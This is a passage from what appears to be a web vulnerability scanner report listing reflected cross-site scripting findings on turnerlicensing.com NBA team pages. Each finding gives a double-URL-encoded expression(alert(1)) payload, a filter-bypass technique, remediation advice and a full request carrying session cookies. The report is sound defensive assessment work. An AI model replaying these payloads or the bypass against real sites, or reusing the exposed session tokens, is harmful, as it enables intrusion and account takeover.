Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.32. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8050476 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/los_angeles_lakers/8050476
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94806'style='x:expression(alert(1))'13a71e1e314 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/los_angeles_lakers/8050476?94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.33. http://www.turnerlicensing.com/NBA/memphis_grizzlies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/memphis_grizzlies
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ff10'style='x:expression(alert(1))'bcb4a180582 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/memphis_grizzlies?9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.34. http://www.turnerlicensing.com/NBA/miami_heat [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/miami_heat
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c96e'style='x:expression(alert(1))'db91eadeb70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/miami_heat?8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.35. http://www.turnerlicensing.com/NBA/miami_heat/8010795 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/miami_heat/8010795
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a51ee'style='x:expression(alert(1))'3e962f6b57e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/miami_heat/8010795?a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.36. http://www.turnerlicensing.com/NBA/milwaukee_bucks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/milwaukee_bucks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2b8b'style='x:expression(alert(1))'046c82d959d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/milwaukee_bucks?d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.37. http://www.turnerlicensing.com/NBA/minnesota_timberwolves [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/minnesota_timberwolves
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5210'style='x:expression(alert(1))'b54a972631c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/minnesota_timberwolves?f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.38. http://www.turnerlicensing.com/NBA/new_jersey_nets [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/new_jersey_nets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3679'style='x:expression(alert(1))'9e9f63a36eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_jersey_nets?b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.39. http://www.turnerlicensing.com/NBA/new_jersey_nets/8080309 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/new_jersey_nets/8080309
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 389d0'style='x:expression(alert(1))'622558a5928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_jersey_nets/8080309?389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.40. http://www.turnerlicensing.com/NBA/new_orleans_hornets [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/new_orleans_hornets
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d44a'style='x:expression(alert(1))'2283fff6c79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_orleans_hornets?9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.41. http://www.turnerlicensing.com/NBA/new_york_knicks [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/new_york_knicks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18049'style='x:expression(alert(1))'a326d28a6dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/new_york_knicks?18049%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527a326d28a6dd=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.42. http://www.turnerlicensing.com/NBA/oklahoma_thunder [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/oklahoma_thunder
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba37e'style='x:expression(alert(1))'0e97dc019c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/oklahoma_thunder?ba37e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270e97dc019c4=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.43. http://www.turnerlicensing.com/NBA/orlando_magic [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/orlando_magic
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc6ff'style='x:expression(alert(1))'e1d7e340077 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/orlando_magic?fc6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e1d7e340077=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.44. http://www.turnerlicensing.com/NBA/philadelphia_76ers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/philadelphia_76ers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91094'style='x:expression(alert(1))'037823385a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/philadelphia_76ers?91094%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527037823385a2=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.45. http://www.turnerlicensing.com/NBA/phoenix_suns [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/phoenix_suns
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7aca'style='x:expression(alert(1))'118be204132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /NBA/phoenix_suns?c7aca%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527118be204132=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;
1.46. http://www.turnerlicensing.com/NBA/portland_trail_blazers [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.turnerlicensing.com
Path: /NBA/portland_trail_blazers
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8dc4e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d08698a97ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8dc4e'style='x:expression(alert(1))'d08698a97ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
